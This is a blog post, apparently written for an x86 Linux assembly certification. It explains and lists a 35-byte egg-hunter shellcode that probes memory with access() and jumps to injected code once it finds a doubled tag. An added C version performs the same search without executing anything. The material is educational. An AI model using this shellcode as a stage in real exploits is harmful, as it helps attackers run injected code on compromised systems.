Monday, 5 May 2014

[SLAE] III Egg Hunting

Source: SecurityTube


I found a very interesting paper that explains different egg-hunting techniques and how to search for the egg on both Windows and Linux (the link is in the comments of the code below). I really recommend reading it if you want to know how egg hunting works.
;SLAE-513 Andriy Brukhovetskyy
;egg hunting: some of the techniques are explained in
;http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
;35 bytes

global _start
section .text
_start:

    xor ecx, ecx    ; ecx = 0 (also the F_OK mode for access())

get_memory_block:
    or dx, 0xfff    ; set the low 12 bits: edx now points at the last byte
                    ; of the current 4 KiB page (PAGE_SIZE - 1)

checker:

    inc edx         ; next address to test (first byte of the next page
                    ; when we come from get_memory_block)
    push byte +0x21 ; __NR_access = 33
    pop eax

    lea ebx, [edx+4] ; pathname = edx+4, so a bad address is reported for
                     ; the last four bytes of the 8-byte signature as well
                     ; ecx already contains 0 (F_OK)
    int 0x80         ; syscall

    ; bad address = EFAULT = -14 = 0xfffffff2, so al == 0xf2
    cmp al, 0xf2     ; any other result (e.g. ENOENT) means the page is readable

    jz get_memory_block ; unreadable page: skip to the next one

    mov eax, 0x50905090 ; the egg (little endian: bytes 90 50 90 50 in memory)
    mov edi, edx

    scasd       ; compare eax with [edi], then edi += 4
    jnz checker ; no match: keep searching

    scasd       ; compare eax with [edi] (second copy of the egg), then edi += 4
    jnz checker ; no match: keep searching

    jmp edi     ; both copies found: edi points just past the egg, jump to the shellcode :)
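To make the two ideas in the hunter easier to test in isolation, here is an added C example (not part of the original post, and not the SLAE code) that mirrors them without executing anything: page_is_readable() does what the access() probe does, treating EFAULT as "unreadable page" and any other answer as "readable", and find_egg() does what the two scasd instructions do, requiring the tag twice in a row. probe_demo() builds one readable page and one PROT_NONE page with mmap() to show that the probe really distinguishes them. The tag value 0x50905090 and the buffer contents are constructed for the example; the host is assumed to be Linux/x86 (little endian).

```c
#define _DEFAULT_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Tag used by the hunter above; in memory it is the bytes 90 50 90 50. */
#define EGG_TAG 0x50905090u

/* Equivalent of "push 33 / pop eax / lea ebx,[edx+4] / int 0x80 / cmp al,0xf2":
 * ask the kernel to treat 'addr' as a pathname. EFAULT means the kernel could
 * not read the memory; any other outcome (ENOENT, ENAMETOOLONG, success)
 * means the page is readable. */
int page_is_readable(const void *addr)
{
    if (access((const char *)addr, F_OK) == 0)
        return 1;
    return errno != EFAULT;
}

/* Equivalent of the two scasd instructions: the tag must appear twice in a
 * row. Searches only inside [buf, buf+len) and returns the offset just past
 * the 8-byte egg, or -1 if it is not there. Nothing is executed. */
long find_egg(const unsigned char *buf, size_t len, uint32_t tag)
{
    for (size_t i = 0; i + 8 <= len; i++) {
        uint32_t first, second;
        memcpy(&first, buf + i, 4);      /* unaligned-safe 32-bit loads */
        memcpy(&second, buf + i + 4, 4);
        if (first == tag && second == tag)
            return (long)(i + 8);
    }
    return -1;
}

/* Constructed demo: a readable page (access("") -> ENOENT, counts as
 * readable) and a PROT_NONE page (access() -> EFAULT, counts as unreadable).
 * Returns 1 when the probe classifies both as the hunter expects. */
int probe_demo(void)
{
    long ps = sysconf(_SC_PAGESIZE);
    char *ok = mmap(NULL, (size_t)ps, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    char *no = mmap(NULL, (size_t)ps, PROT_NONE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (ok == MAP_FAILED || no == MAP_FAILED)
        return 0;
    ok[0] = '\0';                        /* empty pathname -> ENOENT */
    int result = page_is_readable(ok) && !page_is_readable(no);
    munmap(ok, (size_t)ps);
    munmap(no, (size_t)ps);
    return result;
}
```

The PROT_NONE page is the interesting case: it is mapped, so a plain pointer dereference would crash the process, yet access() simply returns EFAULT, which is exactly why the hunter lets the kernel touch the memory on its behalf instead of reading it directly.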

SLAE-513

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

